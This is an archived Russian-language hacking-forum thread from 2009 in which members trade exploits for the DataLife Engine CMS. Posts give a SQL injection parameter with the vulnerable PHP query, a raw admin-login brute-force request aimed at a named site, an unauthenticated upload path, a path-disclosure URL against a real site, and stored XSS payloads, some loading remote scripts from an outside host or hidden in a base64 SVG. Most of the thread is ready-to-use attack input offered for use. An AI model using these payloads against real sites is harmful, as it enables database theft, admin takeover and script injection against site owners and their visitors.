ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

01.03.2009, 22:09
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
Удаление комментариев при помощи AJAX
Версия: v.1.0
sql-inj
Уязвимый скрипт: engine/ajax/commentdelete.php
Запрос: commid=-1'
Метод: GET
Уязвимый кусок кода:
PHP код:
$row = $db->super_query("SELECT * FROM " . PREFIX . "_comments where id = '{$_REQUEST['commid']}'");
Раскручивать не стал...
|
|
|

03.12.2009, 04:48
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме: 8854279
Репутация:
2727
|
|
брутфорс адмики
https://forum.antichat.ru/thread153641.html
бага в посылке пакета без кукисов.
http://vipuzor.com/admin.php
Host: vipuzor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.20) Gecko/20091111 Firefox/3.1.3.37
Referer: http://vipuzor.com/admin.php
Content-Type: application/x-www-form-urlencoded
POST
subaction=dologin&username=admin&password=111111
__________________
ПИУ-ПИУ...
|
|
|

09.04.2009, 13:13
|
|
Участник форума
Регистрация: 04.03.2009
Сообщений: 298
Провел на форуме: 1241030
Репутация:
229
|
|
По адресу site/engine/images.php?area=
Можно заливать картинки на сервер без авторизации
Проверял на 6.7 - пашет
Последний раз редактировалось Jokester; 31.03.2010 в 19:59..
|
|
|

09.05.2009, 17:08
|
|
Новичок
Регистрация: 16.02.2009
Сообщений: 10
Провел на форуме: 390969
Репутация:
8
|
|
Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...?
Когда например в гугле воодишь запрос с ковычкой, то при переходе :
MySQL Error!
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1
Error Number:
1064
|
|
|

09.05.2009, 17:15
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Сообщение от Sosok
Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...?
Когда например в гугле воодишь запрос с ковычкой, то при переходе :
MySQL Error!
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1
Error Number:
1064
покажи подробнее, линком желательно
|
|
|

10.05.2009, 12:18
|
|
Новичок
Регистрация: 16.02.2009
Сообщений: 10
Провел на форуме: 390969
Репутация:
8
|
|
Вот зайдёшь и на самый первый сайт нажми...
http://www.google.com/search?client=opera&rls=ru&q=site:scriptiks.ru+'
Последний раз редактировалось Sosok; 10.05.2009 в 12:27..
|
|
|

10.05.2009, 12:20
|
|
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме: 3884427
Репутация:
766
|
|
там варка в том, что он сохраняет запросы в базу с реферор от гугла или же яши, а если подделать запрос, то можно вызвать скуль эрор, я уже об этом поднимал тему один раз.
|
|
|

10.05.2009, 13:52
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Активные XSS в DLE версии 8.0 (возможно и раньше).
Необходимо несколько специфических настроек.
1) XSS при добавлении новостей из админски, WISYWIG должен быть отключен;
Простое добавление новостей пользователями, WISYWIG должен быть отключен:
Код:
<iframe width=0 border=0 height=0 src=http://ha.ckers.org/scriptlet.html <
Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Код:
<SCRIPT SRC=http://ha.ckers.org/xss.js?
<
2) XSS в комментариях к новостям, WISYWIG должен быть включен:
Код:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<
(с) by Wildshaman, 2009 год.
|
|
|

20.05.2009, 11:12
|
|
Новичок
Регистрация: 19.05.2009
Сообщений: 19
Провел на форуме: 133889
Репутация:
1
|
|
Сообщение от wildshaman
Код:
XSS в комментариях к новостям, WISYWIG должен быть включен:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<
Ет коряво и не работает, т.к. к адресу скрипта коннектится "<" и следующий тег, да и полстраницы обрезается... Если в другю сторону загнуть - фильтрует.
З.Ы. Такая же "уязвимость" и в приватных месагах.
Последний раз редактировалось Genry13; 20.05.2009 в 11:15..
|
|
|

11.05.2009, 17:14
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
DLE 8.0 Раскрытие путей:
Код:
http://dle-news.ru/index.php?do=pm&doaction=del&dle_allow_hash=06e5bbf84191c990867ee5bbacf879b8&master_box=on&selected_pm[][]=8
dle_allow_hash берется из исходника страницы списка персональных сообщений (для каждого юзверя он свой на каждом сайте)...
Активная XSS (требуется доступ в админку)...
идем в редиактирвоание своей инфы в админке ([site]/admin.php?mod=options&action=personal)
, в поле "Полное имя:" пишем
Код:
<script>alert(/Hacked by Wildshaman/)</script>
и смотрим в свой профиль на сайте ([site]/user/username)
(с)Wildshaman 2009 год
Последний раз редактировалось wildshaman; 11.05.2009 в 17:44..
|
|
|
|
 |
|
|
Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
|
|
|
|